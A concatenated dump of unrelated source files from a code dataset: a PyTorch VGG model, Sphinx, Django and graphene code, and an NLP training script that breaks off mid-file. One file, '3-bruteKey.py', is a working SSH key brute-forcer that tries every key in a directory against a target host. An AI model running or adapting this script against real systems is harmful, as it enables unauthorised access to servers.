] | permissive | hsilva664/amc | ff026a6649227f0ee8892248d28bf11a9c47e192 | 801ade50c73068aac2e8f346ef731816ca3683e3 | refs/heads/master | 2022-12-02T19:19:39.417294 | 2020-08-15T15:16:48 | 2020-08-15T15:16:48 | 287,330,024 | 0 | 0 | MIT | 2020-08-13T16:34:11 | 2020-08-13T16:34:10 | null | UTF-8 | Python | false | false | 3,641 | py | import torch.nn as nn
import math
from torch.nn import init
import torch.nn.functional as F
class VGG(nn.Module):
    """VGG-style CNN: 16 conv layers (each followed by batch-norm) plus one
    linear classification head with 10 outputs.

    The forward pass halves the spatial size five times (four max-pools and
    a final 2x2 average pool), so a 32x32 input is reduced to 1x1 before the
    linear layer -- presumably CIFAR-10; TODO confirm against the training
    pipeline.
    """
    def __init__(self):
        super(VGG, self).__init__()
        in_channels = 3
        # Local aliases just to shorten the layer definitions below.
        Conv = nn.Conv2d
        Linear = nn.Linear
        self.pool = nn.MaxPool2d(2)
        self.avgpool = nn.AvgPool2d(2)
        # in-place ReLU shared by every activation site
        self.relu = nn.ReLU(True)
        # Stage 1: 3 -> 64
        self.conv1 = Conv(in_channels, 64, 3, 1, 1)
        self.bn1 = nn.BatchNorm2d(64)
        self.conv2 = Conv(64, 64, 3, 1, 1)
        self.bn2 = nn.BatchNorm2d(64)
        # Stage 2: 64 -> 128
        self.conv3 = Conv(64, 128, 3, 1, 1)
        self.bn3 = nn.BatchNorm2d(128)
        self.conv4 = Conv(128, 128, 3, 1, 1)
        self.bn4 = nn.BatchNorm2d(128)
        # Stage 3: 128 -> 256
        self.conv5 = Conv(128, 256, 3, 1, 1)
        self.bn5 = nn.BatchNorm2d(256)
        self.conv6 = Conv(256, 256, 3, 1, 1)
        self.bn6 = nn.BatchNorm2d(256)
        self.conv7 = Conv(256, 256, 3, 1, 1)
        self.bn7 = nn.BatchNorm2d(256)
        self.conv8 = Conv(256, 256, 3, 1, 1)
        self.bn8 = nn.BatchNorm2d(256)
        # Stage 4: 256 -> 512
        self.conv9 = Conv(256, 512, 3, 1, 1)
        self.bn9 = nn.BatchNorm2d(512)
        self.conv10 = Conv(512, 512, 3, 1, 1)
        self.bn10 = nn.BatchNorm2d(512)
        self.conv11 = Conv(512, 512, 3, 1, 1)
        self.bn11 = nn.BatchNorm2d(512)
        self.conv12 = Conv(512, 512, 3, 1, 1)
        self.bn12 = nn.BatchNorm2d(512)
        # Stage 5: 512 -> 512
        self.conv13 = Conv(512, 512, 3, 1, 1)
        self.bn13 = nn.BatchNorm2d(512)
        self.conv14 = Conv(512, 512, 3, 1, 1)
        self.bn14 = nn.BatchNorm2d(512)
        self.conv15 = Conv(512, 512, 3, 1, 1)
        self.bn15 = nn.BatchNorm2d(512)
        self.conv16 = Conv(512, 512, 3, 1, 1)
        self.bn16 = nn.BatchNorm2d(512)
        self.linear1 = nn.Linear(512, 10)
        # Layers exposed to the pruning framework (all conv layers).
        self.prunable = [self.conv1, self.conv2, self.conv3, self.conv4, self.conv5, self.conv6, self.conv7, self.conv8, self.conv9, self.conv10, self.conv11, self.conv12, self.conv13, self.conv14, self.conv15, self.conv16]
        # Weight init: Xavier for conv/linear, (1, 0) affine for batch-norm.
        # Note the first test is a plain `if`, not part of the elif chain; a
        # Conv2d is never a BatchNorm2d, so behavior is unaffected.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                init.xavier_normal_(m.weight)
            if isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
            elif isinstance(m, nn.Linear):
                init.xavier_normal_(m.weight)
                m.bias.data.zero_()

    def forward(self, x):
        """Forward pass; pre-activation ordering: conv -> (BN+ReLU of the
        previous conv's output feeds the next conv), with max-pool at each
        stage boundary and a final average pool before the linear head."""
        x = self.conv1(x)
        x = self.conv2(self.relu(self.bn1(x)))
        x = self.pool(self.relu(self.bn2(x)))
        x = self.conv3(x)
        x = self.conv4(self.relu(self.bn3(x)))
        x = self.pool(self.relu(self.bn4(x)))
        x = self.conv5(x)
        x = self.conv6(self.relu(self.bn5(x)))
        x = self.conv7(self.relu(self.bn6(x)))
        x = self.conv8(self.relu(self.bn7(x)))
        x = self.pool(self.relu(self.bn8(x)))
        x = self.conv9(x)
        x = self.conv10(self.relu(self.bn9(x)))
        x = self.conv11(self.relu(self.bn10(x)))
        x = self.conv12(self.relu(self.bn11(x)))
        x = self.pool(self.relu(self.bn12(x)))
        x = self.conv13(x)
        x = self.conv14(self.relu(self.bn13(x)))
        x = self.conv15(self.relu(self.bn14(x)))
        x = self.conv16(self.relu(self.bn15(x)))
        x = self.relu(self.bn16(x))
        # squeeze() collapses the 1x1 spatial dims (and, for batch size 1,
        # would also drop the batch dim -- NOTE(review): verify callers never
        # pass a single-sample batch).
        x = self.avgpool(x).squeeze()
        x = self.linear1(x)
        return x
"hsilva664"
] | hsilva664 |
1489caa6ecc1418fcca6f59a6452f6045f77b738 | e0980f704a573894350e285f66f4cf390837238e | /.history/streams/blocks_20201019093841.py | 6cccc214eeeb11cc10ee902cc92078eda7e0e6c4 | [] | no_license | rucpata/WagtailWebsite | 28008474ec779d12ef43bceb61827168274a8b61 | 5aa44f51592f49c9a708fc5515ad877c6a29dfd9 | refs/heads/main | 2023-02-09T15:30:02.133415 | 2021-01-05T14:55:45 | 2021-01-05T14:55:45 | 303,961,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | from wagtail.core import blocks
class TitleBlock(blocks.StructBlock):
text = blocks.Char | [
"rucinska.patrycja@gmail.com"
] | rucinska.patrycja@gmail.com |
214aa11f83be4362189f74450e66ee6346751255 | 02774702ffa5bac8f1e19322254b0f96e7ae2e30 | /doc/conf.py | 5ba02964b2fa0e29fac03296e845e7eeed025093 | [
"BSD-3-Clause"
] | permissive | hiperiondev/ufsm | f10ae78d635644f9b00286dd78e8ade944845a3d | 1b8a51dea78438107523850705f70b41c27100f3 | refs/heads/master | 2023-05-26T14:53:37.733721 | 2023-02-07T20:12:48 | 2023-02-07T20:12:48 | 261,609,005 | 0 | 0 | NOASSERTION | 2020-05-05T23:55:37 | 2020-05-05T23:55:36 | null | UTF-8 | Python | false | false | 9,803 | py | # -*- coding: utf-8 -*-
import sys
import os
import shlex
import sphinx_rtd_theme
import alabaster
import subprocess
# sys.path.append("../python")
# import bpak
# On Read the Docs there is no Makefile step, so generate the Doxygen XML
# (consumed by the breathe extension) as part of the Sphinx build itself.
read_the_docs_build = os.environ.get('READTHEDOCS', None) == 'True'

if read_the_docs_build:
    # Argument-list form avoids spawning a shell; no shell features were used.
    subprocess.call(['doxygen', 'doxygen.cfg'])
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
breathe_projects = {
"ufsm":"xml/",
}
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"alabaster",
"breathe",
"sphinx.ext.extlinks",
"sphinx.ext.autodoc",
"sphinx.ext.viewcode",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ufsm'
copyright = u'2022 Jonas Blixt'
author = u'Jonas Blixt'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The name of the branch/tag on github
with open("../version.txt") as f:
version = f.read().strip()
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
'_build',
"README.rst"
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = "alabaster"
html_theme = 'sphinx_rtd_theme'
#html_theme = 'pydoctheme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {'collapsiblesidebar': True}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
#html_theme_path = [alabaster.get_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pbtoolsdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'ufsm.tex', u'ufsm documentation',
u'Jonas Blixt', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = 'images/logo.jpg'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'ufsm', u'ufsm documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'ufsm', u'ufsm documentation',
author, 'ufsm', 'State machine library',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# extlins
extlinks = {
'github-blob':
('https://github.com/jonasblixt/ufsm/blob/v' + version + '/%s', ''),
'github-tree':
('https://github.com/jonasblixt/ufsm/tree/v' + version + '/%s', ''),
'codecov':
('https://codecov.io/gh/jonasblixt/ufsm/src/v' + version + '/%s', ''),
'codecov-tree':
('https://codecov.io/gh/jonasblixt/ufsm/tree/v' + version + '/%s', '')
}
| [
"jonpe960@gmail.com"
] | jonpe960@gmail.com |
0ad55bdb1eebab0cc2495a270f04bdfce36b26e9 | ec458edd64414566c119717c46fd00f6725ea6b0 | /CH2/3-bruteKey.py | 920875cb71cf000a6f7274f52e698c86e931d9e1 | [] | no_license | porterhau5/violent-python | ad235b0d7eab373649dd390d37193174518a81f2 | f33dba0f48002fe76615ed70b71e4e3bc7344956 | refs/heads/master | 2016-09-05T12:45:37.008027 | 2014-02-27T17:52:37 | 2014-02-27T17:52:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,376 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pexpect
import optparse
import os
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0
def connect(user,host,keyfile,release):
    # Try one SSH key against host as user (Python 2 / pexpect).
    # Sets the module-global Stop on success and bumps Fails when the remote
    # host drops the connection. `release` controls whether the shared
    # connection semaphore is released in the finally block -- the recursive
    # retry below passes False so the slot is released only once.
    global Stop
    global Fails
    try:
        perm_denied = 'Permission denied'
        ssh_newkey = 'Are you sure you want to continue'
        conn_closed = 'Connection closed by remote host'
        # Force key-only auth so a password prompt never blocks the expect.
        opt = ' -o PasswordAuthentication=no'
        connStr = 'ssh ' + user +\
            '@' + host + ' -i ' + keyfile + opt
        child = pexpect.spawn(connStr)
        # Index into this pattern list decides the branch below:
        # 0=timeout, 1=denied, 2=new host key, 3=closed, 4/5=shell prompt.
        ret = child.expect([pexpect.TIMEOUT,perm_denied,\
            ssh_newkey,conn_closed,'$','#',])
        if ret == 2:
            print '[-] Adding Host to ~/.ssh/known_hosts'
            child.sendline('yes')
            # Retry with the host now in known_hosts; keep holding the slot.
            connect(user, host, keyfile, False)
        elif ret == 3:
            print '[-] Connection Closed By Remote Host'
            Fails += 1
        elif ret > 3:
            # Saw a '$' or '#' prompt: the key worked.
            print '[+] Success. ' + str(keyfile)
            Stop = True
    finally:
        if release:
            connection_lock.release()
def main():
parser = optparse.OptionParser('usage %prog -H '+\
'<target host> -u <user> -d <directory>')
parser.add_option('-H', dest='tgtHost', type='string',\
help='specify target host')
parser.add_option('-d', dest='passDir', type='string',\
help='specify directory with keys')
parser.add_option('-u', dest='user', type='string',\
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passDir = options.passDir
user = options.user
if host == None or passDir == None or user == None:
print parser.usage
exit(0)
for filename in os.listdir(passDir):
if Stop:
print '[*] Exiting: Key Found.'
exit(0)
if Fails > 5:
print '[!] Exiting: '+\
'Too Many Connections Closed By Remote Host.'
print '[!] Adjust number of simultaneous threads.'
exit(0)
connection_lock.acquire()
fullpath = os.path.join(passDir, filename)
print '[-] Testing keyfile ' + str(fullpath)
t = Thread(target=connect,\
args=(user, host, fullpath, True))
child = t.start()
if __name__ == '__main__':
main()
| [
"porter.thomas.w@gmail.com"
] | porter.thomas.w@gmail.com |
1d64087b50a7754102a8f120289480550b469a86 | 41bd7d939207e94c8f6956f02b779f5084b23bf4 | /archives/admin.py | 8604e9655b6c0429d898e44ebeaf1a4f5c81a761 | [] | no_license | wd5/acanthes | 724b81c799ab04344c66691a054b2a555b3e3d77 | 8c4fd011e60e9869396f1a93b385133ebff74238 | refs/heads/master | 2021-01-17T12:13:35.216661 | 2012-06-13T13:05:06 | 2012-06-13T13:05:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,171 | py | from django.contrib import admin
from archives.models import *
# Django admin configuration for the archives app: list columns, filters,
# search fields, and the large set of OAI/legacy fields hidden from the
# Audio edit form.

class IntervenantAudioInline(admin.TabularInline):
    # Edit Intervenant<->Audio links inline on the Audio page.
    model = IntervenantAudio
    extra = 1

class AudioAdmin(admin.ModelAdmin):
    inlines = (IntervenantAudioInline,)
    list_display = ('id','subtitle', 'annee', 'genre', 'url_ecoute_intranet_adresse' )
    list_filter = ('annee', )
    search_fields = ['subtitle', ]
    # Hide derived/imported metadata (durations, URLs, OAI-PMH record
    # fields, timestamps) from the admin form.
    exclude = ('duree', 'total_durees', 'chemin_fichier', 'lien_test_web', 'dateissued_portail', 'horodatage_modification',
        'url_export_ircam', 'type_ircam', 'date_enregistrement', 'acanthes',
        'horodatage_creation', 'url_ecoute_extranet', 'url_ecoute_internet', 'url_ecoute_intranet', 'details_intranet_actuel_acda',
        'oai_web_oai_mods', 'oai_id', 'oai_titleinfo_title', 'oai_typeofresource', 'oai_genre', 'oai_origininfo_place',
        'oai_origininfo_publisher', 'oai_origininfo_datecaptured', 'oai_language_languageterm_1', 'oai_language_languageterm_2',
        'oai_language_languageterm_3', 'oai_physicaldescription_form', 'oai_physicaldescription_internetmediatype', 'oai_physicaldescription_digitalorigin',
        'oai_abstract', 'oai_targetaudience', 'oai_location_url_preview', 'oai_location_url_full', 'oai_location_physicallocation', 'oai_accesscondition',
        'oai_recordinfo_recordcontentsource', 'oai_recordinfo_recordcreationdate', 'oai_recordinfo_recordchangedate', 'oai_recordinfo_recordidentifier',
        'oai_recordinfo_languageofcataloging_languageterm', 'oai_publication')

class IntervenantAdmin(admin.ModelAdmin):
    list_display = ('nom', 'prenom')
    exclude = ('horodatage_creation', 'horodatage_modification')
    search_fields = ['nom', 'prenom']

class LangueAdmin(admin.ModelAdmin):
    list_display = ('languageterm',)

class LieuAdmin(admin.ModelAdmin):
    list_display = ('placeterm', 'salle')

class OrchestreAdmin(admin.ModelAdmin):
    list_display = ('nom_complet', 'sous_titre')
    search_fields = ['nom_complet', ]

admin.site.register(Audio, AudioAdmin)
admin.site.register(Intervenant, IntervenantAdmin)
admin.site.register(Langue, LangueAdmin)
admin.site.register(Lieu, LieuAdmin)
admin.site.register(Orchestre, OrchestreAdmin)
"samuel.goldszmidt@gmail.com"
] | samuel.goldszmidt@gmail.com |
4214ef52a286e542963069c28dd6fc6baa4fb451 | a01aa15daf3f625420a0ab1bee18674361dee717 | /code/editData.py | c8f2189585959ddb98bd31f94e8d626c14256fae | [] | no_license | sirinda-p/sna_utcc | f6ddf92a2ce81ec7a9f69f8da0deafdf2dcc1fc2 | 39276ebd838a9d2d6ee209a4a50fe25e721473a3 | refs/heads/master | 2020-04-03T15:29:38.820434 | 2016-03-25T09:40:09 | 2016-03-25T09:40:09 | 39,806,492 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 826 | py | import os
from igraph import *
def mark():
    """Collect the set of source-node ids found in a fixed list of GML files.

    NOTE(review): only the id-collection half is implemented; the trailing
    comments describe the intended marking/removal step, and `newpath` /
    `error_list` are currently unused placeholders for it.
    """
    oldpath = "/home/amm/Desktop/sna-git/data/"
    newpath = oldpath+"mark_unsurveyed/"
    error_list = []
    fname_list = ["ICT55_friend.gml","ICT55_bf.gml","ICT55_study.gml"]
    for fname in fname_list:
    #for fname in os.listdir(oldpath):
        ## get source nodes
        # Context manager closes each file (the original leaked one open
        # handle per iteration).
        with open(oldpath+fname, "r") as f_r:
            lines = f_r.readlines()
        id_set = set()
        for line in lines:
            # Split once per line (the original split twice), and only
            # unpack when there are exactly the two expected tokens --
            # a 3-token line would have crashed the bare `fst, snd =`.
            fields = line.split()
            if len(fields) > 1:
                fst, snd = fields[0], fields[1]
                if fst.strip()=="id":
                    # Drop the leading `"node` prefix of the quoted id.
                    newid = snd.strip()[5::]
                    if newid not in id_set:
                        id_set.add(newid)
        ## get IDs not in id_set (IDs still in official student list but are unreachable)
        ## These IDs won't appear as 'source' but can be 'target'
        ## Have to remove those edges whose targets are the unreachable

mark()
| [
"sirinda111@gmail.com"
] | sirinda111@gmail.com |
f457a785953ecdf207ae402a089a175cd1f04eb3 | fa7c4eb33a1bf329469f67eb1fe13ae8e8d17f11 | /my_env/bin/tox | d1ea66b4d8ef1f0ca669c0ce52de9148956084e3 | [] | no_license | richa696/rich | cea39c0266fc61365388d7248d632d965d8ecbee | 168768bd80fb5941cc0c6232b9b38d37a675d0e2 | refs/heads/master | 2023-04-05T23:06:34.402323 | 2021-04-29T18:57:05 | 2021-04-29T18:57:05 | 362,917,333 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | #!/home/richa/ProjectFolder/my_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from tox import cmdline
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(cmdline())
| [
"tiwariricha696@gmail.com"
] | tiwariricha696@gmail.com | |
38a28d7f0257148f8e867dcfd6350f0e6276dd14 | f7dd190a665a4966db33dcc1cc461dd060ca5946 | /venv/Lib/site-packages/graphene/types/tests/test_schema.py | 88af101988356209c9722d213bfa5137344960fa | [] | no_license | Darwin939/macmeharder_back | 2cc35e2e8b39a82c8ce201e63d9f6a9954a04463 | 8fc078333a746ac7f65497e155c58415252b2d33 | refs/heads/main | 2023-02-28T12:01:23.237320 | 2021-02-02T17:37:33 | 2021-02-02T17:37:33 | 328,173,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,022 | py | import pytest
from ..field import Field
from ..objecttype import ObjectType
from ..scalars import String
from ..schema import Schema
# Minimal two-type schema fixture: Query is the root, MyOtherType is
# reachable only through Query.inner.

class MyOtherType(ObjectType):
    field = String()

class Query(ObjectType):
    inner = Field(MyOtherType)

def test_schema():
    # The schema's query type must map back to the graphene Query class.
    schema = Schema(Query)
    assert schema.get_query_type() == schema.get_graphql_type(Query)

def test_schema_get_type():
    # Registered types are reachable as attributes on the schema.
    schema = Schema(Query)
    assert schema.Query == Query
    assert schema.MyOtherType == MyOtherType

def test_schema_get_type_error():
    # Looking up an unknown type raises AttributeError with a clear message.
    schema = Schema(Query)
    with pytest.raises(AttributeError) as exc_info:
        schema.X
    assert str(exc_info.value) == 'Type "X" not found in the Schema'
def test_schema_str():
schema = Schema(Query)
assert (
str(schema)
== """schema {
query: Query
}
type MyOtherType {
field: String
}
type Query {
inner: MyOtherType
}
"""
)
def test_schema_introspect():
    # Introspection result must expose the standard __schema root key.
    schema = Schema(Query)
    assert "__schema" in schema.introspect()
| [
"51247000+Darwin939@users.noreply.github.com"
] | 51247000+Darwin939@users.noreply.github.com |
3fb37feddd63cc8a4d7f068c61376c3140e247f1 | 033dcdc8c51d41de1d8a48e042dff392d0215f7f | /django_eventstream/eventrequest.py | 6a9de59e80a9208d451c74ebf5c2a146153334da | [
"MIT"
] | permissive | paolodina/django-eventstream | a726b70122800aabe7674a4419e3545e81ae82ec | d8e90c121704e727becdb37fae33cf610898ec2e | refs/heads/master | 2022-11-06T17:43:22.338747 | 2020-06-16T08:24:09 | 2020-06-16T08:24:09 | 272,642,690 | 0 | 0 | MIT | 2020-06-16T07:43:41 | 2020-06-16T07:43:40 | null | UTF-8 | Python | false | false | 3,049 | py | import time
import jwt
import six
from django.contrib.auth import get_user_model
from django.conf import settings
from .utils import parse_last_event_id, get_channelmanager
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
class EventRequest(object):
    """Parsed parameters of an event-stream HTTP request.

    Resolves the requested channels, the per-channel last-seen event ids
    (from GRIP recovery state or the Last-Event-ID header / lastEventId
    query params), and the requesting user (from a signed es-meta token or
    the Django session).
    """

    class Error(ValueError):
        pass

    class GripError(Error):
        pass

    class ResumeNotAllowedError(Error):
        pass

    def __init__(self, http_request=None, channel_limit=10, view_kwargs=None):
        if view_kwargs is None:
            view_kwargs = {}

        self.channels = set()
        self.channel_last_ids = {}
        self.is_recover = False
        self.user = None

        if http_request:
            self.apply_http_request(http_request,
                channel_limit=channel_limit,
                view_kwargs=view_kwargs)

    def apply_http_request(self, http_request, channel_limit, view_kwargs):
        """Populate this object from an HTTP request.

        :raises EventRequest.Error: no channels, too many channels, or an
            unparseable last-event id
        :raises EventRequest.ResumeNotAllowedError: client tries to resume
            after a stream-error
        """
        is_next = False
        is_recover = False
        user = None

        es_meta = {}
        if http_request.GET.get('es-meta'):
            # NOTE(review): jwt.decode is called without algorithms=; on
            # PyJWT >= 2 this raises, and on older versions it permits
            # algorithm confusion -- confirm the pinned PyJWT version.
            es_meta = jwt.decode(http_request.GET['es-meta'], settings.SECRET_KEY.encode('utf-8'))
            # Manual expiry check (jwt.decode may already verify 'exp'
            # depending on the PyJWT version in use).
            if int(time.time()) >= es_meta['exp']:
                raise ValueError('es-meta signature is expired')

        # User: from the signed token when present, else the Django session.
        if 'user' in es_meta:
            if es_meta['user'] != 'anonymous':
                user = get_user_model().objects.get(pk=es_meta['user'])
        else:
            if hasattr(http_request, 'user') and http_request.user.is_authenticated:
                user = http_request.user

        # Channels: from the signed token when present, else resolved by the
        # configured channel manager.
        if 'channels' in es_meta:
            channels = es_meta['channels']
        else:
            channelmanager = get_channelmanager()
            channels = channelmanager.get_channels_for_request(http_request, view_kwargs)

        if len(channels) < 1:
            raise EventRequest.Error('No channels specified')

        if len(channels) > channel_limit:
            raise EventRequest.Error('Channel limit exceeded')

        if http_request.GET.get('link') == 'next':
            is_next = True

        if http_request.GET.get('recover') == 'true':
            # GRIP recovery: last ids come from the proxy's per-channel
            # state; grip channel names are prefixed with 'events-'.
            channel_last_ids = {}
            is_recover = True
            for grip_channel, last_id in six.iteritems(http_request.grip.last):
                if not grip_channel.startswith('events-'):
                    continue
                channel = unquote(grip_channel[7:])
                if channel in channels:
                    channel_last_ids[channel] = last_id
        else:
            last_event_id = http_request.META.get('HTTP_LAST_EVENT_ID')
            if not last_event_id:
                # take the first non-empty param, from the end
                for val in reversed(http_request.GET.getlist('lastEventId')):
                    if val:
                        last_event_id = val
                        break
            if last_event_id:
                if last_event_id == 'error':
                    raise EventRequest.ResumeNotAllowedError(
                        'Can\'t resume session after stream-error')
                try:
                    parsed = parse_last_event_id(last_event_id)
                    channel_last_ids = {}
                    for channel, last_id in six.iteritems(parsed):
                        channel = unquote(channel)
                        if channel in channels:
                            channel_last_ids[channel] = last_id
                # Narrowed from a bare `except:`, which also swallowed
                # KeyboardInterrupt/SystemExit.
                except Exception:
                    raise EventRequest.Error(
                        'Failed to parse Last-Event-ID or lastEventId')
            else:
                channel_last_ids = {}

        self.channels = channels
        self.channel_last_ids = channel_last_ids
        self.is_next = is_next
        self.is_recover = is_recover
        self.user = user
| [
"justin@karneges.com"
] | justin@karneges.com |
d0844357d421f9aad1b024b3426a21f65f26b9a8 | 66f20f488ef479a9bad1c379ad33f29522a0cacb | /main.py | 71eaf75adfbb6e4cdbdb09457fc0da5527924b72 | [] | no_license | daniele21/NLP_genre_detection | b221b1f5755b7b9a5b244bacb8ba32a2f8e28f17 | 8ece41c38eea67d61f5c014d06f759434d698ad3 | refs/heads/master | 2023-04-10T17:01:12.346117 | 2021-04-21T13:45:29 | 2021-04-21T13:45:29 | 333,126,644 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,719 | py | from argparse import ArgumentParser
import logging
from scripts.pipeline.dataset_pipeline import generate_training_dataset
from scripts.pipeline.training_pipeline import training_pipeline
from scripts.training.model_training import train_model
logger = logging.getLogger(__name__)
def main(args):
    """Build the hyper-parameter dict from CLI args and run the pipeline.

    NOTE(review): the `dataset` flag is read but the dataset-generation
    branch is not implemented -- when --dataset is set, nothing runs (the
    imported generate_training_dataset is never called). The returned model
    is also discarded.
    """
    params = {}
    # Data loading / splitting options.
    params['data'] = {'train': True,
                      'split_size': args.split_size,
                      'shuffle': args.shuffle,
                      'seed': args.seed,
                      'preload': args.preload,
                      'data_path': args.data_path,
                      'tokenizer': args.tokenizer}
    # Network architecture / optimization options (optimizer and loss are
    # commented out here; presumably set inside the training pipeline).
    params['network'] = {'word_emb_size': args.emb_size,
                         'weights': None,
                         'trainable': True,
                         'lstm_units': args.lstm_units,
                         'dropout_rate': args.dropout,
                         # 'optimizer': tf.keras.optimizers.Adam,
                         'lr': args.lr,
                         # 'loss': tf.keras.losses.BinaryCrossentropy(from_logits=True),
                         }
    params['training'] = {'batch_size': args.batch_size,
                          'epochs': args.epochs}

    dataset = args.dataset
    train = args.train

    if not dataset and train:
        model = training_pipeline(params)
if __name__ == '__main__':
    parser = ArgumentParser()

    # argparse's type=bool is a well-known trap: bool("False") is True, so
